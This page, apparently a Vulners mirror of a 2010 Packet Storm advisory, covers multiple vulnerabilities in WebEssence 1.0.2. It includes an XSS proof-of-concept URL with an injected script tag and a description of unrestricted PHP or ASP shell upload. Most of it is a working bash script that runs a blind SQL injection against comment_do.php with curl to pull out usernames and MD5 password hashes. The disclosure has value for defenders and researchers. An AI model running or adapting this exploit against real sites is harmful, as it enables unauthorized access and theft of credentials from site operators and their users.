Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WebEssence 1.0.2 Cross Site Scripting / SQL Injection

🗓️ 27 Apr 2010 00:00:00Reported by white_sheepType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 22 Views

WebEssence 1.0.2 Multiple Vulnerabilities. Cross Site Scripting, SQL Injection, Remote Shell Upload, Remote Blind SQL Injectio

Code
`  
  
#  
# WebEssence 1.0.2 Multiple Vulnerabilities  
#  
# Bugs found by white_sheep, R00T_ATI and epicfail  
# for Debug|Track session @ Backtrack|italia community conference  
# www.backtrack.it  
#   
# # # # # # # # # XSS # # # # # # # # # # # #   
# PoC:  
# http://localhost/webessence/webessence/oembed.php?url=http://google.com&id=<script>alert('Backtrack|it');</script>  
# In "url" variable is possible to inject a remote HTML page  
#   
# # # # # # Remote Shell Uplaod # # # # # # #   
# PoC: (thanks to emgent)  
# Unprivileged registered user can upload any PHP or ASP file that can be found in "uploads/other/"  
#  
# # # # # Remote Blind Sql Injection # # # # #  
  
#!/bin/bash  
  
query1="1/**/AND/**/CHAR("  
query2=")=(SELECT/**/SUBSTRING(name,"  
query3=",1)/**/FROM/**/users)"  
url=$1  
path=$2  
  
if [ "$1" == "" || "$2" == "" ]  
then  
echo "Usage: $0 [url] [path]"  
echo "Example: $0 http://localhost /webessence"  
exit  
fi  
  
good=0  
position=1  
  
#SEARCH USERNAME  
echo -n "Username: "  
while [ $good -lt 1 ]  
do  
found="false"  
for name in `seq 97 122`  
do  
NOW=`curl -s -d "name=Ph33r&url=&email=&comment=Ph33r&itemid=$query1$name$query2$position$query3" -H "Referer: $url$path" -H "Content-Type: application/x-www-form-urlencoded" $url$path/comment_do.php`  
if [ "$NOW" == "" ]  
then  
let position+=1  
found="true"  
perl -e "printf '%c', $name;"  
continue  
fi  
  
done  
if [ "$found" == "false" ]  
then  
good=1  
fi  
done  
  
good=0  
position=1  
query2=")=(SELECT/**/SUBSTRING(pwd,"  
pwd_chr="48 49 50 51 52 53 54 55 56 57 97 98 99 100 101 102"  
  
#SEARCH PASSWORD  
echo ""  
echo -n "MD5 Pass: "   
while [ $good -lt 1 ]   
do   
found="false"   
for pwd in $pwd_chr   
do   
NOW=`curl -s -d "name=Ph33r&url=&email=&comment=Ph33r&itemid=$query1$pwd$query2$position$query3" -H "Referer: $url$path" -H "Content-Type: application/x-www-form-urlencoded" $url$path/comment_do.php`   
if [ "$NOW" == "" ]   
then   
let position+=1   
found="true"   
perl -e "printf '%c', $pwd;"  
continue   
fi   
  
done   
if [ "$found" == "false" ]   
then   
good=1   
fi   
done  
echo ""  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Apr 2010 00:00Current
0.2Low risk
Vulners AI Score0.2
webessencevulnerabilitiescross site scriptingsql injectionremote shell uploadremote blind sql injectionbacktrackitaliacommunity conferencedebugtrackwhite sheepr00t_atiepicfailemgentphpaspremote htmlremoteshellblindsql.
22